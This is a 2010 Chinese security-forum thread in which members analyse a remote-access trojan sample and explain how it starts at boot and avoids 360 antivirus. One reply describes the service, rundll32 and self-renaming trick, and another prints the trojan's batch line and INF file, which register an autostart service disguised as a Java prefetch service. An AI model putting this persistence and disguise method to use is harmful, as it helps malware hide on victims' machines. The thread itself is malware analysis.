首页
社区
课程
招聘
高手帮忙分析下,这远程马是如何显示自身启动 逃过360的
发表于: 2010-9-8 15:32 6016

高手帮忙分析下,这远程马是如何显示自身启动 逃过360的

2010-9-8 15:32
6016
上网时候发现的,先想学习他的技术,请高手帮忙分析下

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (14)
雪    币: 220
活跃值: (711)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
服务启动EXE,EXE启动RUNDLL32启动DLL后,EXE改名,DLL监视关机消息,发现关机,将EXE改回来。

这种马只要把RUNDLL32关了,就废了,重起也没用了,呵呵
2010-9-10 10:10
0
雪    币: 468
活跃值: (52)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
100kx,见者有份,呵呵。
2010-9-10 11:04
0
雪    币: 998
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
占座,接分~
2010-9-10 12:01
0
雪    币: 44
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
见者有分啊,楼主给我点分吧,争取买个邀请码
2010-9-10 12:20
0
雪    币: 45
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
100kx,见者有份,哈哈..
2010-9-11 09:57
0
雪    币: 1163
活跃值: (137)
能力值: ( LV12,RANK:230 )
在线值:
发帖
回帖
粉丝
7
时间戳是9月5号的,感谢楼主提供样本。
2010-9-11 10:22
0
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
问题是,他是如何实现开机自动上线的呢?
2010-9-13 11:33
0
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
而且360还不会提示
2010-9-13 11:34
0
雪    币: 13
活跃值: (22)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
应该是采用HOOK驱动模式
2010-9-13 11:35
0
雪    币: 220
活跃值: (711)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
启动方式就是服务呀!怎么都没看我的分析?
2010-10-9 10:19
0
雪    币: 275
活跃值: (51)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
很感兴趣不过更感兴趣kx币~~
2010-10-11 16:01
0
雪    币: 1602
活跃值: (14)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
apple.bat   
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\windows\system32\systeminf.inf

systeminf.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=JavaQuickjnhga2,,My_AddService_Name
[My_AddService_Name]
DisplayName=Prefetches JRE files for qfaster startujknb
Description=Prefetches JRE files for faster startup of Java applets and applications.c
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\windows\system32\mjilgj.td    //随机
2010-10-17 05:55
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
新人初到,看的第一贴
2010-10-17 13:21
0
雪    币: 87
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
登陆的第一帖。。。。
2010-10-19 12:09
0
游客
登录 | 注册 方可回帖
返回
//